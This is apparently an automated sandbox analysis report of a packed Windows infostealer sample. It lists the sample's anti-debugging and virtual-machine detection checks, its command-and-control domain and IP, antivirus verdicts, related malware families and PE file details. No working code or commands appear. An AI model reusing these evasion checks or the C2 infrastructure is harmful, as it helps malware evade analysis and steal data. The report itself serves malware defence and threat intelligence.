Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_009A9980 rdtsc 1_2_009A9980
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_007C255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses, 1_2_007C255D
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_007C29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle, 1_2_007C29FF
Source: t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: t6VDbnvGeN.exe | Binary or memory string: Hyper-V RAW
Source: t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: t6VDbnvGeN.exe, 00000001.00000003.1401357288.0000000001ACD000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1401710410.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll", "pid": 5648 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 6312 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 6704 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 5684 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 5220 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 2516 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 2608 }, { "name": "tNGfGIoLPRFiirVuLLZBgzXOrKNsC.exe", "pid": 6676 }, { "n
Source: t6VDbnvGeN.exe, 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_07540BDB Start: 07540E4C End: 07540BF7 1_2_07540BDB
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_075A095F Start: 075A0CAD End: 075A09DC 1_2_075A095F
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_075A09AB Start: 075A0CAD End: 075A09DC 1_2_075A09AB
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | File opened: NTICE
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | File opened: SICE
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Code function: 1_2_009A9980 rdtsc 1_2_009A9980
Source: t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000002.1427600992.0000000001090000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\t6VDbnvGeN.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: procmon.exe
Source: t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.7:49703 -> 185.121.15.192:80

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| t6VDbnvGeN.exe | 42% | ReversingLabs | Win32.Infostealer.Tinba |
| t6VDbnvGeN.exe | 53% | Virustotal | |
| t6VDbnvGeN.exe | 100% | Avira | TR/Crypt.TPM.Gen |
| t6VDbnvGeN.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| home.fivetk5ht.top | 185.121.15.192 | true | false | | high |
| httpbin.org | 98.85.100.80 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 | true | | unknown |
| https://httpbin.org/ip | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://curl.se/docs/hsts.html | t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |
| http://html4/loose.dtd | t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |
| https://curl.se/docs/alt-svc.html# | t6VDbnvGeN.exe | false | | high |
| http://home.fivetk5ht.top/zldPR | t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp | t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | unknown |
| https://httpbin.org/ipbefore | t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |
| https://curl.se/docs/http-cookies.html | t6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1 | t6VDbnvGeN.exe, 00000001.00000003.1402020419.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1436520961.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1402037179.0000000001A67000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| https://curl.se/docs/hsts.html# | t6VDbnvGeN.exe | false | | high |
| http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17 | t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | unknown |
| https://curl.se/docs/http-cookies.html# | t6VDbnvGeN.exe | false | | high |
| https://curl.se/docs/alt-svc.html | t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |
| http://.css | t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |
| http://home.fivetk5ht.top/zldPRE_ | t6VDbnvGeN.exe, 00000001.00000003.1401357288.0000000001ACD000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1401710410.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://.jpg | t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmp | false | | high |

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 185.121.15.192 | home.fivetk5ht.top | Spain | 207046 | REDSERVICIOES | false |
| 98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false |

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1578907
Start date and time: 2024-12-20 16:31:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 59s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: t6VDbnvGeN.exe
renamed because original name is a hash value
Original Sample Name: 9e3eebdf7f1998324106447a4eb441c8.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
• Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

| Time | Type | Description |
|---|---|---|
| 10:32:27 | API Interceptor | 3x Sleep call for process: t6VDbnvGeN.exe modified |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 185.121.15.192 | 16ebsersuX.exe | malicious | Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 |
| 185.121.15.192 | hUhhrsyGtz.exe | malicious | Cryptbot | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 |
| 185.121.15.192 | pCElIX19tu.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 |
| 185.121.15.192 | CMpuGis28l.exe | malicious | Unknown | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851 |
| 185.121.15.192 | 5Jat5RkD3a.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 |
| 185.121.15.192 | u57m8aCdwb.exe | malicious | Unknown | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 |
| 185.121.15.192 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 |
| 185.121.15.192 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758 |
| 98.85.100.80 | CMpuGis28l.exe | malicious | Unknown | |
| 98.85.100.80 | u57m8aCdwb.exe | malicious | Unknown | |
| 98.85.100.80 | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | |
| 98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | |
| 98.85.100.80 | file.exe | malicious | LummaC, Amadey, LummaC Stealer | |
| 98.85.100.80 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | |
| 98.85.100.80 | Tii6ue74NB.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, Vidar | |
| 98.85.100.80 | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS | |
| 98.85.100.80 | file.exe | malicious | LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Xmrig | |
| 98.85.100.80 | SwJD3kiOwV.exe | malicious | Clipboard Hijacker, Cryptbot | |

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| home.fivetk5ht.top | hUhhrsyGtz.exe | malicious | Cryptbot | 185.121.15.192 |
| home.fivetk5ht.top | pCElIX19tu.exe | malicious | Unknown | 185.121.15.192 |
| home.fivetk5ht.top | CMpuGis28l.exe | malicious | Unknown | 185.121.15.192 |
| home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192 |
| home.fivetk5ht.top | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 185.121.15.192 |
| httpbin.org | 16ebsersuX.exe | malicious | Cryptbot | 34.226.108.155 |
| httpbin.org | hUhhrsyGtz.exe | malicious | Cryptbot | 34.226.108.155 |
| httpbin.org | pCElIX19tu.exe | malicious | Unknown | 34.226.108.155 |
| httpbin.org | CMpuGis28l.exe | malicious | Unknown | 98.85.100.80 |
| httpbin.org | 5Jat5RkD3a.exe | malicious | Unknown | 34.226.108.155 |
| httpbin.org | u57m8aCdwb.exe | malicious | Unknown | 98.85.100.80 |
| httpbin.org | TnIhoWAr57.exe | malicious | Clipboard Hijacker, Cryptbot | 98.85.100.80 |
| httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | 34.226.108.155 |
| httpbin.org | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT | |
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 34.226.108.155
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TWC-11351-NORTHEASTUSCMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 98.85.100.80
                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 72.226.210.219
                                                            hmips.elfGet hashmaliciousMiraiBrowse
                                                            • 45.46.119.24
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                            • 98.85.100.80
                                                            la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                            • 67.252.15.48
                                                            la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                            • 98.94.131.188
                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                            • 98.85.100.80
                                                            REDSERVICIOES16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                            • 185.121.15.192
                                                            hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                            • 185.121.15.192
                                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 185.121.15.192
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 185.121.15.192
                                                            http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.137
                                                            IGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 185.189.98.142
                                                            No context
                                                            No context
                                                            No created / dropped files found
                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.982368030810664
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:t6VDbnvGeN.exe
                                                            File size:4'454'912 bytes
                                                            MD5:9e3eebdf7f1998324106447a4eb441c8
                                                            SHA1:d12942ff362dcd14ae488b68c5c9585dea00098f
                                                            SHA256:5407d390bc945fe70785068124bf0a35d110e179aae137cdc67cce85824915bf
                                                            SHA512:83df6faaa8cb4892aa28880649bd10f008928ac39fc66475467cb35be72464e914135d2fa13f650625f3946ccfb6f9a30c5262d9e43e1cbcc13ba08fb8f4bec7
                                                            SSDEEP:98304:QME0xSOjUxSUTV202TlCie7PlzIY8OY8vQ2YM6zmJJxtL79:QwfdUTU02TlPe7PlzIYYMvY3uL
                                                            TLSH:F52633035BFBF084F4A8633452C5A62D7AE531346C33E35A059C7389C60FE7AB5169AE
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@.................................rHD...@... ............................
                                                            Icon Hash:00928e8e8686b000
                                                            Entrypoint:0x1086000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                            DLL Characteristics:DYNAMIC_BASE
                                                            Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                            Instruction
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x74705f | 0x73 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x746000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc83ea8 | 0x10 | jyayxkzc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xc83e58 | 0x18 | jyayxkzc |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x745000 | 0x284c00 | bd11fed6c083f8b5a8ac7626fb9641d3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x746000 | 0x1ac | 0x200 | 276a38012fe4577fd45e76106826e702 | False | 0.5859375 | data | 4.521067132921128 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x747000 | 0x1000 | 0x200 | e84636d45557e74dadd0f14f36394655 | False | 0.166015625 | data | 1.1471680400846989 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x748000 | 0x385000 | 0x200 | a967315a7071a9fdc59a6807a570ed82 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| jyayxkzc | 0xacd000 | 0x1b8000 | 0x1b7200 | 2b0c2ae76bc5da1f31c99fd74f95d574 | False | 0.9943974834543126 | data | 7.954718124398861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| tlfatyfb | 0xc85000 | 0x1000 | 0x400 | 637d5fdf745258af236fb2e1ee1b52f6 | False | 0.798828125 | data | 6.162326391919003 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0xc86000 | 0x3000 | 0x2200 | 499131df98e08d953a990437ac9f05dc | False | 0.0661764705882353 | DOS executable (COM) | 0.7791474897854377 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0xc83eb8 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |
| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                            Dec 20, 2024 16:32:27.941811085 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941818953 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942140102 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942150116 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942161083 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942171097 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942173004 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.942179918 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942190886 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942235947 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.942264080 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.059712887 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.059855938 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.059981108 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060031891 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060065985 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.060100079 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.060152054 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060203075 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.060269117 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060404062 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060414076 CET8049703185.121.15.192192.168.2.7
